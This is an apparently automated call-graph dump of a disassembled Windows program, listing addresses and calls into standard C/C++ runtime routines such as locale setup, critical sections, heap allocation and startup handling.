aa13f0 std::_Throw_Cpp_error 44 API calls 20276->20277 20279 aa175c 20277->20279 20278 aa152f codecvt 20287 aa15bc 20278->20287 20303 aa63b0 20278->20303 20280 ab2ecf std::ios_base::_Init 43 API calls 20279->20280 20283 aa1761 20280->20283 20281->20278 20282 aa76d0 std::_Throw_Cpp_error 49 API calls 20281->20282 20282->20278 20285 ab2ecf std::ios_base::_Init 43 API calls 20283->20285 20286 aa1766 20285->20286 20318 aabc5e 20286->20318 20288 aa63b0 std::_Throw_Cpp_error 44 API calls 20287->20288 20290 aa1634 codecvt 20287->20290 20288->20290 20290->20279 20292 aa169d std::ios_base::_Ios_base_dtor 20290->20292 20291 aa1782 std::ios_base::_Ios_base_dtor 20291->20251 20293 aabbfb ___std_exception_copy 43 API calls 20292->20293 20294 aa16f2 20293->20294 20294->20283 20295 aa1723 std::ios_base::_Ios_base_dtor 20294->20295 20296 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20295->20296 20297 aa1751 20296->20297 20297->20251 20299 aa7be2 std::_Throw_Cpp_error 44 API calls 20298->20299 20300 aa13fa 20299->20300 20301 aabbfb ___std_exception_copy 43 API calls 20300->20301 20302 aa1421 20301->20302 20304 aa63cd 20303->20304 20305 aa64f2 20303->20305 20309 aa642f 20304->20309 20310 aa643c 20304->20310 20312 aa63e6 20304->20312 20306 aa13f0 std::_Throw_Cpp_error 44 API calls 20305->20306 20307 aa64f7 20306->20307 20308 aa1370 std::_Throw_Cpp_error 44 API calls 20307->20308 20316 aa63f6 codecvt 20308->20316 20309->20307 20309->20312 20314 aab076 std::ios_base::_Init 3 API calls 20310->20314 20310->20316 20311 aab076 std::ios_base::_Init 3 API calls 20311->20316 20312->20311 20313 ab2ecf std::ios_base::_Init 43 API calls 20315 aa6501 20313->20315 20314->20316 20316->20313 20317 aa64af std::ios_base::_Ios_base_dtor codecvt 20316->20317 20317->20287 20319 aabc6b 20318->20319 20321 aabc72 20318->20321 20320 ab225f ___vcrt_freefls@4 14 API calls 20319->20320 20320->20321 20321->20291 20323 aa2230 std::ios_base::_Init 49 API calls 20322->20323 20324 aa3cef 20323->20324 20324->20243 20371 aa7905 20325->20371 20328 aa7905 std::_Lockit::_Lockit 7 API calls 20330 aa4ebc 20328->20330 20329 aa4edd 20331 aa4f00 20329->20331 20334 aa4f2f 20329->20334 20377 aa795d 20330->20377 20332 aa795d std::_Lockit::~_Lockit 2 API calls 20331->20332 20333 aa4f09 20332->20333 20333->20175 20336 aa4f48 20334->20336 20337 aa4f33 20334->20337 20339 aab076 std::ios_base::_Init 3 API calls 20336->20339 20338 aa795d std::_Lockit::~_Lockit 2 API calls 20337->20338 20340 aa4f3e 20338->20340 20341 aa4f4f 20339->20341 20340->20175 20342 aa7905 std::_Lockit::_Lockit 7 API calls 20341->20342 20343 aa4f7b 20342->20343 20344 aa501f 20343->20344 20345 aa4fc1 20343->20345 20420 aa7c22 20344->20420 20384 aa9135 20345->20384 20365 aa3230 49 API calls 20364->20365 20366 aa6f6e 20365->20366 20367 aa2230 std::ios_base::_Init 49 API calls 20366->20367 20368 aa6ff3 20367->20368 20369 aa52a3 20368->20369 20370 aa4b80 49 API calls 20368->20370 20369->20177 20370->20369 20372 aa791b 20371->20372 20373 aa7914 20371->20373 20375 aa4ea2 20372->20375 20430 aaa968 EnterCriticalSection 20372->20430 20425 ab3070 20373->20425 20375->20328 20375->20329 20378 ab307e 20377->20378 20379 aa7967 20377->20379 20483 ab3059 LeaveCriticalSection 20378->20483 20383 aa797a 20379->20383 20482 aaa976 LeaveCriticalSection 20379->20482 20382 ab3085 20382->20329 20383->20329 20484 ab4802 20384->20484 20388 aa9159 20389 aa9169 20388->20389 20390 ab4802 std::_Locinfo::_Locinfo_dtor 70 API calls 20388->20390 20391 aa8f8f _Yarn 14 API calls 20389->20391 20390->20389 20392 aa4fcc 20391->20392 20393 aaa4b3 20392->20393 20675 ab5054 20393->20675 20395 aaa4bc __Getctype 20396 aaa4d6 20395->20396 20397 aaa4f4 20395->20397 20680 ab4f0d 20396->20680 20399 ab4f0d __Getctype 43 API calls 20397->20399 20400 aaa4dd 20399->20400 20685 ab5079 20400->20685 20404 aa4fe3 20405 aa1a20 20404->20405 20710 aa9180 20405->20710 20408 aa1a39 20409 aa1a50 20408->20409 20411 ab225f ___vcrt_freefls@4 14 API calls 20408->20411 20412 aa1a67 20409->20412 20413 ab225f ___vcrt_freefls@4 14 API calls 20409->20413 20410 ab225f ___vcrt_freefls@4 14 API calls 20410->20408 20411->20409 20414 ab225f ___vcrt_freefls@4 14 API calls 20412->20414 20417 aa1a7e 20412->20417 20413->20412 20414->20417 20415 aa1aac 20416 aa1a95 20416->20415 20419 ab225f ___vcrt_freefls@4 14 API calls 20416->20419 20417->20416 20418 ab225f ___vcrt_freefls@4 14 API calls 20417->20418 20418->20416 20419->20415 20714 aa7b79 20420->20714 20423 aabca0 Concurrency::cancel_current_task RaiseException 20424 aa7c41 20423->20424 20431 ab922b 20425->20431 20430->20375 20452 ab8b31 20431->20452 20451 ab925d 20451->20451 20453 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 20452->20453 20454 ab8b47 20453->20454 20455 ab8b4b 20454->20455 20456 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 20455->20456 20457 ab8b61 20456->20457 20458 ab8b65 20457->20458 20459 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 20458->20459 20460 ab8b7b 20459->20460 20461 ab8b7f 20460->20461 20462 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 20461->20462 20463 ab8b95 20462->20463 20464 ab8b99 20463->20464 20465 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 20464->20465 20466 ab8baf 20465->20466 20467 ab8bb3 20466->20467 20468 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 20467->20468 20469 ab8bc9 20468->20469 20470 ab8bcd 20469->20470 20471 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 20470->20471 20472 ab8be3 20471->20472 20473 ab8be7 20472->20473 20474 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 20473->20474 20475 ab8bfd 20474->20475 20476 ab8c1b 20475->20476 20477 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 20476->20477 20478 ab8c31 20477->20478 20479 ab8c01 20478->20479 20480 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 20479->20480 20481 ab8c17 20480->20481 20481->20451 20482->20383 20483->20382 20485 ab922b std::_Locinfo::_Locinfo_dtor 5 API calls 20484->20485 20486 ab480f 20485->20486 20493 ab45ad 20486->20493 20489 aa8f8f 20490 aa8f9d 20489->20490 20492 aa8fa9 ___std_exception_copy codecvt 20489->20492 20491 ab225f ___vcrt_freefls@4 14 API calls 20490->20491 20490->20492 20491->20492 20492->20388 20494 ab45b9 ___scrt_is_nonwritable_in_current_image 20493->20494 20501 ab3011 EnterCriticalSection 20494->20501 20496 ab45c7 20502 ab4608 20496->20502 20501->20496 20530 ab4767 20502->20530 20504 ab4623 20505 ab45d4 20504->20505 20554 ab98c7 GetLastError 20504->20554 20527 ab45fc 20505->20527 20510 ab465c 20510->20505 20514 ab2eec __Getctype 11 API calls 20510->20514 20511 ab4675 20587 ab9c27 20511->20587 20515 ab4766 20514->20515 20516 abe964 std::_Locinfo::_Locinfo_dtor 45 API calls 20517 ab469d 20516->20517 20518 ab46bf 20517->20518 20519 ab46a4 20517->20519 20524 ab8a3f ___free_lconv_mon 14 API calls 20518->20524 20525 ab46ea 20518->20525 20520 ab475a 20519->20520 20522 ab46b6 20519->20522 20520->20510 20521 ab46bc 20521->20505 20523 ab8a3f ___free_lconv_mon 14 API calls 20522->20523 20523->20521 20524->20525 20525->20521 20526 ab8a3f ___free_lconv_mon 14 API calls 20525->20526 20526->20521 20674 ab3059 LeaveCriticalSection 20527->20674 20529 aa9141 20529->20489 20531 ab4773 20530->20531 20532 ab4781 20530->20532 20594 ab7638 20531->20594 20609 abe5a2 20532->20609 20535 ab477d 20535->20504 20537 ab47f7 20540 ab2eec __Getctype 11 API calls 20537->20540 20538 ab89e2 __Getctype 14 API calls 20539 ab47b3 20538->20539 20541 ab47db 20539->20541 20543 abe5a2 std::_Locinfo::_Locinfo_dtor 45 API calls 20539->20543 20542 ab4801 20540->20542 20544 ab8a3f ___free_lconv_mon 14 API calls 20541->20544 20545 ab922b std::_Locinfo::_Locinfo_dtor 5 API calls 20542->20545 20546 ab47ca 20543->20546 20547 ab47f0 20544->20547 20548 ab480f 20545->20548 20549 ab47dd 20546->20549 20550 ab47d1 20546->20550 20547->20504 20551 ab45ad std::_Locinfo::_Locinfo_dtor 70 API calls 20548->20551 20552 ab7638 std::_Locinfo::_Locinfo_dtor 67 API calls 20549->20552 20550->20537 20550->20541 20553 ab4838 20551->20553 20552->20541 20553->20504 20555 ab98dd 20554->20555 20556 ab98e3 20554->20556 20557 ab8f6b __Getctype 6 API calls 20555->20557 20558 ab8faa __Getctype 6 API calls 20556->20558 20560 ab98e7 SetLastError 20556->20560 20557->20556 20559 ab98ff 20558->20559 20559->20560 20562 ab89e2 __Getctype 14 API calls 20559->20562 20564 ab997c 20560->20564 20565 ab4630 20560->20565 20563 ab9914 20562->20563 20566 ab992d 20563->20566 20567 ab991c 20563->20567 20568 ab3087 __purecall 41 API calls 20564->20568 20581 abe964 20565->20581 20570 ab8faa __Getctype 6 API calls 20566->20570 20569 ab8faa __Getctype 6 API calls 20567->20569 20571 ab9981 20568->20571 20579 ab992a 20569->20579 20572 ab9939 20570->20572 20573 ab993d 20572->20573 20574 ab9954 20572->20574 20576 ab8faa __Getctype 6 API calls 20573->20576 20575 ab96f5 __Getctype 14 API calls 20574->20575 20578 ab995f 20575->20578 20576->20579 20577 ab8a3f ___free_lconv_mon 14 API calls 20577->20560 20580 ab8a3f ___free_lconv_mon 14 API calls 20578->20580 20579->20577 20580->20560 20582 abe978 _Fputc 20581->20582 20641 abe5df 20582->20641 20585 ab0740 _Fputc 43 API calls 20586 ab4655 20585->20586 20586->20510 20586->20511 20588 ab9c65 20587->20588 20592 ab9c35 __Getctype 20587->20592 20589 ab2fbd __strnicoll 14 API calls 20588->20589 20591 ab4681 20589->20591 20590 ab9c50 HeapAlloc 20590->20591 20590->20592 20591->20505 20591->20516 20592->20588 20592->20590 20593 ab8364 std::ios_base::_Init 2 API calls 20592->20593 20593->20592 20595 ab764e 20594->20595 20596 ab7662 20594->20596 20598 ab2fbd __strnicoll 14 API calls 20595->20598 20597 ab98c7 __Getctype 43 API calls 20596->20597 20599 ab7667 20597->20599 20600 ab7653 20598->20600 20601 ab922b std::_Locinfo::_Locinfo_dtor 5 API calls 20599->20601 20602 ab2ebf __strnicoll 43 API calls 20600->20602 20603 ab766f 20601->20603 20604 ab765e 20602->20604 20615 ac1b53 20603->20615 20604->20535 20608 ab76b6 20608->20535 20610 abe5b5 _Fputc 20609->20610 20632 abe2f7 20610->20632 20613 ab0740 _Fputc 43 API calls 20614 ab4798 20613->20614 20614->20537 20614->20538 20616 ac1b5f ___scrt_is_nonwritable_in_current_image 20615->20616 20617 ab98c7 __Getctype 43 API calls 20616->20617 20618 ac1b68 20617->20618 20619 ab7674 20618->20619 20620 ab3011 std::_Lockit::_Lockit EnterCriticalSection 20618->20620 20628 ab6c40 20619->20628 20621 ac1b86 20620->20621 20622 ac1bd4 __Getctype 14 API calls 20621->20622 20623 ac1b97 20622->20623 20624 ac1bb3 __Getctype LeaveCriticalSection 20623->20624 20625 ac1baa 20624->20625 20625->20619 20626 ab3087 __purecall 43 API calls 20625->20626 20627 ac1bd3 20626->20627 20629 ab6c4c ___scrt_is_nonwritable_in_current_image 20628->20629 20630 ab6d6d std::_Locinfo::_Locinfo_dtor 67 API calls 20629->20630 20631 ab6c58 std::_Locinfo::_Locinfo_dtor 20630->20631 20631->20608 20633 abe30a 20632->20633 20634 abe30e 20633->20634 20635 abe336 20633->20635 20636 ab2e42 _Fputc 43 API calls 20634->20636 20637 abe3d7 std::_Locinfo::_Locinfo_dtor 45 API calls 20635->20637 20639 abe35b 20635->20639 20640 abe32c 20636->20640 20637->20639 20638 ab2e42 _Fputc 43 API calls 20638->20640 20639->20638 20639->20640 20640->20613 20642 abe5f6 20641->20642 20643 abe5fa 20642->20643 20645 abe622 20642->20645 20644 ab2e42 _Fputc 43 API calls 20643->20644 20649 abe618 20644->20649 20648 abe644 20645->20648 20650 abe6bd 20645->20650 20647 ab2e42 _Fputc 43 API calls 20647->20649 20648->20647 20648->20649 20649->20585 20651 abe6ed 20650->20651 20652 abe71a 20651->20652 20653 abe6fc 20651->20653 20664 abe6f1 20651->20664 20655 abe727 20652->20655 20657 ab1e20 _Fputc 43 API calls 20652->20657 20654 ab2e42 _Fputc 43 API calls 20653->20654 20654->20664 20658 abe75f 20655->20658 20659 abe741 20655->20659 20656 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20660 abe962 20656->20660 20657->20655 20662 abe8ef 20658->20662 20663 abe773 20658->20663 20661 ac4f56 std::_Locinfo::_Locinfo_dtor 5 API calls 20659->20661 20660->20648 20661->20664 20662->20664 20665 abf13e _Fputc WideCharToMultiByte 20662->20665 20663->20664 20666 abe80d 20663->20666 20670 abe7b7 20663->20670 20664->20656 20665->20664 20667 abf13e _Fputc WideCharToMultiByte 20666->20667 20669 abe820 20667->20669 20668 abf13e _Fputc WideCharToMultiByte 20668->20664 20669->20664 20671 abe839 GetLastError 20669->20671 20670->20668 20671->20664 20673 abe848 20671->20673 20672 abf13e _Fputc WideCharToMultiByte 20672->20673 20673->20664 20673->20672 20674->20529 20676 ab98c7 __Getctype 43 API calls 20675->20676 20677 ab505f 20676->20677 20697 ab9c75 20677->20697 20681 ab98c7 __Getctype 43 API calls 20680->20681 20682 ab4f18 20681->20682 20683 ab9c75 __Getctype 43 API calls 20682->20683 20684 ab4f28 20683->20684 20684->20400 20686 ab98c7 __Getctype 43 API calls 20685->20686 20687 ab5084 20686->20687 20688 ab9c75 __Getctype 43 API calls 20687->20688 20689 aaa505 20688->20689 20689->20404 20690 ab5522 20689->20690 20691 ab556a 20690->20691 20692 ab552f ___std_exception_copy 20690->20692 20691->20404 20692->20691 20701 abef79 20692->20701 20695 ab2eec __Getctype 11 API calls 20696 ab5580 20695->20696 20698 ab9c88 20697->20698 20699 ab506f 20697->20699 20698->20699 20700 ac1b53 __Getctype 43 API calls 20698->20700 20699->20395 20700->20699 20702 abef95 20701->20702 20703 abef87 20701->20703 20704 ab2fbd __strnicoll 14 API calls 20702->20704 20703->20702 20708 abefaf 20703->20708 20705 abef9f 20704->20705 20706 ab2ebf __strnicoll 43 API calls 20705->20706 20707 ab5563 20706->20707 20707->20691 20707->20695 20708->20707 20709 ab2fbd __strnicoll 14 API calls 20708->20709 20709->20705 20711 aa1a29 20710->20711 20712 aa918c 20710->20712 20711->20408 20711->20410 20713 ab4802 std::_Locinfo::_Locinfo_dtor 70 API calls 20712->20713 20713->20711 20715 aa1280 std::invalid_argument::invalid_argument 43 API calls 20714->20715 20716 aa7b8b 20715->20716 20716->20423 20731 ab1e7b 20717->20731 20719 ab22d4 20725 ab22f8 20719->20725 20738 ab1e20 20719->20738 20720 ab228c 20720->20719 20721 ab22a1 20720->20721 20730 ab22bc std::_Locinfo::_Locinfo_dtor 20720->20730 20722 ab2e42 _Fputc 43 API calls 20721->20722 20722->20730 20727 ab231c 20725->20727 20745 ab2acb 20725->20745 20726 ab23a4 20728 ab1dc7 43 API calls 20726->20728 20727->20726 20752 ab1dc7 20727->20752 20728->20730 20730->20182 20732 ab1e93 20731->20732 20733 ab1e80 20731->20733 20732->20720 20734 ab2fbd __strnicoll 14 API calls 20733->20734 20735 ab1e85 20734->20735 20736 ab2ebf __strnicoll 43 API calls 20735->20736 20737 ab1e90 20736->20737 20737->20720 20739 ab09e0 _Fputc 43 API calls 20738->20739 20740 ab1e30 20739->20740 20758 ab9ca2 20740->20758 20746 ab2ad7 20745->20746 20748 ab2aed 20745->20748 20747 ab4f0d __Getctype 43 API calls 20746->20747 20750 ab2ae2 std::_Locinfo::_Locinfo_dtor 20747->20750 20749 ab2afd 20748->20749 20787 abad53 20748->20787 20749->20725 20750->20725 20753 ab1dd8 20752->20753 20754 ab1dec 20752->20754 20753->20754 20755 ab2fbd __strnicoll 14 API calls 20753->20755 20754->20726 20756 ab1de1 20755->20756 20757 ab2ebf __strnicoll 43 API calls 20756->20757 20757->20754 20759 ab9cb9 20758->20759 20760 ab1e4d 20758->20760 20759->20760 20761 ac1b53 __Getctype 43 API calls 20759->20761 20762 ab9d00 20760->20762 20761->20760 20763 ab9d17 20762->20763 20765 ab1e5a 20762->20765 20763->20765 20766 ac0236 20763->20766 20765->20725 20767 ab98c7 __Getctype 43 API calls 20766->20767 20768 ac023b 20767->20768 20771 ac014e 20768->20771 20772 ac015a ___scrt_is_nonwritable_in_current_image 20771->20772 20774 ac0174 20772->20774 20782 ab3011 EnterCriticalSection 20772->20782 20775 ac017b 20774->20775 20777 ab3087 __purecall 43 API calls 20774->20777 20775->20765 20776 ac01b0 20783 ac01cd 20776->20783 20779 ac01ed 20777->20779 20780 ac0184 20780->20776 20781 ab8a3f ___free_lconv_mon 14 API calls 20780->20781 20781->20776 20782->20780 20786 ab3059 LeaveCriticalSection 20783->20786 20785 ac01d4 20785->20774 20786->20785 20794 ab5581 20787->20794 20791 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20793 abae1c 20791->20793 20792 abad80 20792->20791 20793->20749 20795 ab5598 20794->20795 20796 ab559f 20794->20796 20795->20792 20802 abec39 20795->20802 20796->20795 20797 ab98c7 __Getctype 43 API calls 20796->20797 20798 ab55c0 20797->20798 20799 ab9c75 __Getctype 43 API calls 20798->20799 20800 ab55d6 20799->20800 20817 ab9cd3 20800->20817 20803 ab5581 __strnicoll 43 API calls 20802->20803 20804 abec59 20803->20804 20821 abf0c2 20804->20821 20806 abed1d 20809 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20806->20809 20807 abed15 20824 aaad7d 20807->20824 20808 abec86 20808->20806 20808->20807 20811 ab9c27 __fread_nolock 15 API calls 20808->20811 20813 abecab __alloca_probe_16 codecvt 20808->20813 20812 abed40 20809->20812 20811->20813 20812->20792 20813->20807 20814 abf0c2 __strnicoll MultiByteToWideChar 20813->20814 20815 abecf6 20814->20815 20815->20807 20816 abed01 GetStringTypeW 20815->20816 20816->20807 20818 ab9cfb 20817->20818 20819 ab9ce6 20817->20819 20818->20795 20819->20818 20820 ac0236 __strnicoll 43 API calls 20819->20820 20820->20818 20822 abf0d3 MultiByteToWideChar 20821->20822 20822->20808 20825 aaad87 20824->20825 20827 aaad98 20824->20827 20826 ab225f ___vcrt_freefls@4 14 API calls 20825->20826 20825->20827 20826->20827 20827->20806 20829 aaa63d codecvt 20828->20829 20830 ab5054 __Getctype 43 API calls 20829->20830 20831 aaa645 20830->20831 20841 ab50a0 20831->20841 20834 ab5079 __Getctype 43 API calls 20835 aaa654 20834->20835 20836 ab4f0d __Getctype 43 API calls 20835->20836 20837 aa667e 20835->20837 20836->20837 20837->20209 20839 aab076 std::ios_base::_Init 3 API calls 20838->20839 20840 aa9010 20839->20840 20840->20190 20842 ab98c7 __Getctype 43 API calls 20841->20842 20843 ab50ab 20842->20843 20844 ab9c75 __Getctype 43 API calls 20843->20844 20845 aaa64c 20844->20845 20845->20834 20846->19798 23534 ab94fd 23535 ab9509 ___scrt_is_nonwritable_in_current_image 23534->23535 23546 ab3011 EnterCriticalSection 23535->23546 23537 ab9510 23547 ac09c8 23537->23547 23540 ab952e 23571 ab9554 23540->23571 23546->23537 23548 ac09d4 ___scrt_is_nonwritable_in_current_image 23547->23548 23549 ac09dd 23548->23549 23550 ac09fe 23548->23550 23552 ab2fbd __strnicoll 14 API calls 23549->23552 23574 ab3011 EnterCriticalSection 23550->23574 23553 ac09e2 23552->23553 23554 ab2ebf __strnicoll 43 API calls 23553->23554 23556 ab951f 23554->23556 23555 ac0a36 23582 ac0a5d 23555->23582 23556->23540 23560 ab9397 GetStartupInfoW 23556->23560 23559 ac0a0a 23559->23555 23575 ac0918 23559->23575 23561 ab9448 23560->23561 23562 ab93b4 23560->23562 23566 ab944d 23561->23566 23562->23561 23563 ac09c8 44 API calls 23562->23563 23564 ab93dc 23563->23564 23564->23561 23565 ab940c GetFileType 23564->23565 23565->23564 23567 ab9454 23566->23567 23568 ab9497 GetStdHandle 23567->23568 23569 ab94f9 23567->23569 23570 ab94aa GetFileType 23567->23570 23568->23567 23569->23540 23570->23567 23591 ab3059 LeaveCriticalSection 23571->23591 23573 ab953f 23574->23559 23576 ab89e2 __Getctype 14 API calls 23575->23576 23578 ac092a 23576->23578 23577 ac0937 23579 ab8a3f ___free_lconv_mon 14 API calls 23577->23579 23578->23577 23585 ab9067 23578->23585 23580 ac098c 23579->23580 23580->23559 23590 ab3059 LeaveCriticalSection 23582->23590 23584 ac0a64 23584->23556 23586 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 23585->23586 23587 ab9083 23586->23587 23588 ab90a1 InitializeCriticalSectionAndSpinCount 23587->23588 23589 ab908c 23587->23589 23588->23589 23589->23578 23590->23584 23591->23573 20847 aaaed7 20848 aaaee3 ___scrt_is_nonwritable_in_current_image 20847->20848 20873 aab14d 20848->20873 20850 aaaeea 20851 aab043 20850->20851 20861 aaaf14 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock __purecall 20850->20861 20914 aab73a IsProcessorFeaturePresent 20851->20914 20853 aab04a 20854 aab050 20853->20854 20918 ab6b7b 20853->20918 20856 ab6b3f __purecall 23 API calls 20854->20856 20857 aab058 20856->20857 20858 aaaf33 20859 aaafb4 20881 ab67b9 20859->20881 20861->20858 20861->20859 20896 ab6b55 20861->20896 20863 aaafba 20885 ac9ad0 20863->20885 20865 aaafd1 20903 aab854 GetModuleHandleW 20865->20903 20868 aaafdf 20869 aaafe8 20868->20869 20905 ab6b30 20868->20905 20908 aab2be 20869->20908 20874 aab156 20873->20874 20921 aab420 IsProcessorFeaturePresent 20874->20921 20878 aab167 20879 aab16b 20878->20879 20931 aae1bd 20878->20931 20879->20850 20882 ab67c7 20881->20882 20883 ab67c2 20881->20883 20882->20863 20991 ab6513 20883->20991 20886 aab076 std::ios_base::_Init 3 API calls 20885->20886 20887 ac9b09 20886->20887 21230 ac9a10 20887->21230 20889 ac9b13 20890 ac9b38 std::ios_base::_Ios_base_dtor 20889->20890 21271 aa1210 20889->21271 20890->20865 20892 ac9b28 20893 aa5030 49 API calls 20892->20893 20894 ac9b32 20893->20894 20895 aa5240 76 API calls 20894->20895 20895->20890 20897 ab21fb ___scrt_is_nonwritable_in_current_image 20896->20897 20898 ab6b6b std::_Locinfo::_Locinfo_dtor 20896->20898 20899 ab98c7 __Getctype 43 API calls 20897->20899 20898->20859 20901 ab220c 20899->20901 20900 ab3087 __purecall 43 API calls 20902 ab2236 20900->20902 20901->20900 20904 aaafdb 20903->20904 20904->20853 20904->20868 21798 ab6963 20905->21798 20909 aab2ca 20908->20909 20910 aaaff1 20909->20910 21873 ab883c 20909->21873 20910->20858 20912 aab2d8 20913 aae1bd ___scrt_uninitialize_crt 7 API calls 20912->20913 20913->20910 20915 aab750 __purecall codecvt 20914->20915 20916 aab7fb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 20915->20916 20917 aab83f __purecall 20916->20917 20917->20853 20919 ab6963 __purecall 23 API calls 20918->20919 20920 ab6b8c 20919->20920 20920->20854 20922 aab162 20921->20922 20923 aae19e 20922->20923 20937 aaf277 20923->20937 20926 aae1a7 20926->20878 20928 aae1af 20929 aae1ba 20928->20929 20951 aaf2b3 20928->20951 20929->20878 20932 aae1d0 20931->20932 20933 aae1c6 20931->20933 20932->20879 20934 aae336 ___vcrt_uninitialize_ptd 6 API calls 20933->20934 20935 aae1cb 20934->20935 20936 aaf2b3 ___vcrt_uninitialize_locks DeleteCriticalSection 20935->20936 20936->20932 20940 aaf280 20937->20940 20939 aaf2a9 20942 aaf2b3 ___vcrt_uninitialize_locks DeleteCriticalSection 20939->20942 20940->20939 20941 aae1a3 20940->20941 20955 aaf4bc 20940->20955 20941->20926 20943 aae303 20941->20943 20942->20941 20972 aaf3cd 20943->20972 20946 aae318 20946->20928 20949 aae333 20949->20928 20952 aaf2dd 20951->20952 20953 aaf2be 20951->20953 20952->20926 20954 aaf2c8 DeleteCriticalSection 20953->20954 20954->20952 20954->20954 20960 aaf2e2 20955->20960 20958 aaf4df 20958->20940 20959 aaf4f4 InitializeCriticalSectionAndSpinCount 20959->20958 20961 aaf2ff 20960->20961 20962 aaf303 20960->20962 20961->20958 20961->20959 20962->20961 20963 aaf36b GetProcAddress 20962->20963 20965 aaf35c 20962->20965 20967 aaf382 LoadLibraryExW 20962->20967 20963->20961 20965->20963 20966 aaf364 FreeLibrary 20965->20966 20966->20963 20968 aaf3c9 20967->20968 20969 aaf399 GetLastError 20967->20969 20968->20962 20969->20968 20970 aaf3a4 ___vcrt_FlsGetValue 20969->20970 20970->20968 20971 aaf3ba LoadLibraryExW 20970->20971 20971->20962 20973 aaf2e2 ___vcrt_FlsGetValue 5 API calls 20972->20973 20974 aaf3e7 20973->20974 20975 aaf400 TlsAlloc 20974->20975 20976 aae30d 20974->20976 20976->20946 20977 aaf47e 20976->20977 20978 aaf2e2 ___vcrt_FlsGetValue 5 API calls 20977->20978 20979 aaf498 20978->20979 20980 aaf4b3 TlsSetValue 20979->20980 20981 aae326 20979->20981 20980->20981 20981->20949 20982 aae336 20981->20982 20983 aae346 20982->20983 20984 aae340 20982->20984 20983->20946 20986 aaf408 20984->20986 20987 aaf2e2 ___vcrt_FlsGetValue 5 API calls 20986->20987 20988 aaf422 20987->20988 20989 aaf43a TlsFree 20988->20989 20990 aaf42e 20988->20990 20989->20990 20990->20983 20992 ab651c 20991->20992 20995 ab6532 20991->20995 20992->20995 20997 ab653f 20992->20997 20994 ab6529 20994->20995 21014 ab66aa 20994->21014 20995->20882 20998 ab654b 20997->20998 20999 ab6548 20997->20999 21022 ac01ee 20998->21022 20999->20994 21004 ab6568 21049 ab6599 21004->21049 21005 ab655c 21007 ab8a3f ___free_lconv_mon 14 API calls 21005->21007 21009 ab6562 21007->21009 21009->20994 21010 ab8a3f ___free_lconv_mon 14 API calls 21011 ab658c 21010->21011 21012 ab8a3f ___free_lconv_mon 14 API calls 21011->21012 21013 ab6592 21012->21013 21013->20994 21015 ab66b9 21014->21015 21016 ab671b 21014->21016 21015->21016 21017 ab89e2 __Getctype 14 API calls 21015->21017 21018 ab671f 21015->21018 21019 abf13e WideCharToMultiByte _Fputc 21015->21019 21021 ab8a3f ___free_lconv_mon 14 API calls 21015->21021 21016->20995 21017->21015 21020 ab8a3f ___free_lconv_mon 14 API calls 21018->21020 21019->21015 21020->21016 21021->21015 21023 ac01f7 21022->21023 21024 ab6551 21022->21024 21071 ab9982 21023->21071 21028 ac04f0 GetEnvironmentStringsW 21024->21028 21029 ac0508 21028->21029 21042 ab6556 21028->21042 21030 abf13e _Fputc WideCharToMultiByte 21029->21030 21031 ac0525 21030->21031 21032 ac052f FreeEnvironmentStringsW 21031->21032 21033 ac053a 21031->21033 21032->21042 21034 ab9c27 __fread_nolock 15 API calls 21033->21034 21035 ac0541 21034->21035 21036 ac0549 21035->21036 21037 ac055a 21035->21037 21038 ab8a3f ___free_lconv_mon 14 API calls 21036->21038 21039 abf13e _Fputc WideCharToMultiByte 21037->21039 21040 ac054e FreeEnvironmentStringsW 21038->21040 21041 ac056a 21039->21041 21040->21042 21043 ac0579 21041->21043 21044 ac0571 21041->21044 21042->21004 21042->21005 21046 ab8a3f ___free_lconv_mon 14 API calls 21043->21046 21045 ab8a3f ___free_lconv_mon 14 API calls 21044->21045 21047 ac0577 FreeEnvironmentStringsW 21045->21047 21046->21047 21047->21042 21050 ab65ae 21049->21050 21051 ab89e2 __Getctype 14 API calls 21050->21051 21052 ab65d5 21051->21052 21053 ab65dd 21052->21053 21062 ab65e7 21052->21062 21054 ab8a3f ___free_lconv_mon 14 API calls 21053->21054 21070 ab656f 21054->21070 21055 ab6644 21056 ab8a3f ___free_lconv_mon 14 API calls 21055->21056 21056->21070 21057 ab89e2 __Getctype 14 API calls 21057->21062 21058 ab6653 21224 ab667b 21058->21224 21060 ab88cb ___std_exception_copy 43 API calls 21060->21062 21062->21055 21062->21057 21062->21058 21062->21060 21064 ab666e 21062->21064 21066 ab8a3f ___free_lconv_mon 14 API calls 21062->21066 21063 ab8a3f ___free_lconv_mon 14 API calls 21065 ab6660 21063->21065 21067 ab2eec __Getctype 11 API calls 21064->21067 21068 ab8a3f ___free_lconv_mon 14 API calls 21065->21068 21066->21062 21069 ab667a 21067->21069 21068->21070 21070->21010 21072 ab998d 21071->21072 21073 ab9993 21071->21073 21074 ab8f6b __Getctype 6 API calls 21072->21074 21075 ab8faa __Getctype 6 API calls 21073->21075 21093 ab9999 21073->21093 21074->21073 21076 ab99ad 21075->21076 21078 ab89e2 __Getctype 14 API calls 21076->21078 21076->21093 21077 ab999e 21096 abfff9 21077->21096 21080 ab99bd 21078->21080 21079 ab3087 __purecall 43 API calls 21081 ab9a17 21079->21081 21082 ab99da 21080->21082 21083 ab99c5 21080->21083 21084 ab8faa __Getctype 6 API calls 21082->21084 21085 ab8faa __Getctype 6 API calls 21083->21085 21086 ab99e6 21084->21086 21087 ab99d1 21085->21087 21088 ab99ea 21086->21088 21089 ab99f9 21086->21089 21092 ab8a3f ___free_lconv_mon 14 API calls 21087->21092 21090 ab8faa __Getctype 6 API calls 